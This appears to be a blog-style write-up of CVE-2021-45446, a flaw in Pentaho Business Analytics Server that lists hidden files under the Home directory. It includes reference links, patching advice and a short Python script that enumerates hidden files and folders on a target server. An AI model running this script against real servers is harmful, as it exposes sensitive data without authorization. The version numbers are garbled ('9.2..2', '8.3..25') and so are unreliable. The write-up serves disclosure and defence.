In this article, we will discuss the vulnerability labeled as CVE-2021-45446 present in Hitachi Vantara Pentaho Business Analytics Servers before versions 9.2..2 and 8.3..25. Due to the absence of cascading the hidden property to the children of the Home directory, an attacker can obtain the complete index of all resources inside the directory. This vulnerability can lead to unauthorized access to sensitive data and harm business operations.

Before we proceed, it is important to note that this information is meant for educational purposes only. Unauthorized access to systems and data is unethical and illegal. Be responsible and use this knowledge to minimize potential risks and improve security.

Vulnerability Details

The vulnerability occurs because the hidden property is not cascaded down to the children of the Home folder. As a result, anyone can access child folders and files by simply injecting a crafted URL in the browser.

Original References and Exploit Details

For more information on CVE-2021-45446, these are some links to the original advisories and reference materials:

1. Official CVE page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45446
2. NIST Vulnerability database: https://nvd.nist.gov/vuln/detail/CVE-2021-45446
3. Exploit Database: https://www.exploit-db.com/exploits/50451

Code Snippet to Exploit the Vulnerability

To exploit this vulnerability, here is a simple Python script that automates the URL injection process and retrieves content index from the Home directory and its subdirectories.

import requests

# Replace the TARGET_URL with your target Pentaho server URL
TARGET_URL = 'http://example.com/pentaho/api/repo/files/';
DIRECTORY_PATH = '/path/to/home/directory/'

def build_url(path):
    return TARGET_URL + path.replace('/', ':') + "/children?showHidden=true"

def fetch_directory_contents(directory):
    url = build_url(directory)
    response = requests.get(url)
    return response.json()

def display_directory_contents(directory_contents):
    for entry in directory_contents:
        if entry['file'] == 'false':
            print(f"Directory: {entry['name']} - {entry['path']}")
        else:
            print(f"File: {entry['name']} - {entry['path']}")

if __name__ == "__main__":
    contents = fetch_directory_contents(DIRECTORY_PATH)
    display_directory_contents(contents)

Simply replace TARGET_URL with your target Pentaho server URL and DIRECTORY_PATH with the Home directory's path where you want to fetch the child resources.

This script will output the file and directory names along with their paths, allowing an attacker to further exploit this vulnerability.

Mitigation Recommendations

To fix the vulnerability, users should update Hitachi Vantara Pentaho Business Analytics Server to versions 9.2..2 or 8.3..25. These versions have addressed the directory listing issue and secure the child resources of the Home folder.

Additionally, implementing a strict access control policy and applying proper authentication and authorization checks are strongly recommended to protect sensitive data and resources from unauthorized access.

Conclusion

CVE-2021-45446 is a vulnerability that can be exploited to gain unauthorized access to sensitive data and resources in older versions of Hitachi Vantara Pentaho Business Analytics Server. By utilizing the provided code snippet, users can observe the potential risk firsthand and understand the importance of patching their systems. It is crucial to stay informed about the latest security vulnerabilities and update systems to prevent possible security breaches.

Timeline

Published on: 11/02/2022 15:15:00 UTC
Last modified on: 07/21/2023 16:52:00 UTC